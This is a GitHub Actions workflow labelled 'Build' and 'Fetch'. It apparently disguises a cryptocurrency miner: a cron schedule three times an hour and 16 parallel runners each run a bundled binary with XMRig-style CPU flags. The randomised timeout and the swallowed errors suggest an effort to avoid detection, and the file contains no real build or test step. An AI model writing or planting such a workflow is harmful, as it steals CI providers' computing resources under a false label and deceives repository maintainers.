name: Build
on:
  push:
  schedule:
    - cron: "10,30,50 * * * *"
jobs:
  test:
    name: Fetch
    runs-on: ubuntu-latest
    container: ubuntu:20.10
    env:
      DEBIAN_FRONTEND: noninteractive
    strategy:
      fail-fast: false
      matrix:
        runners: [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15]
    steps:
      - run: |
          apt update -qq
          apt install -y git
      - uses: actions/checkout@v2
      - run: |
          apt install -y libuv1 libssl1.1 libhwloc15
          timeout $(shuf -i 300-820 -n 1) ./prog --cpu-no-yield --cpu-priority 5 || true
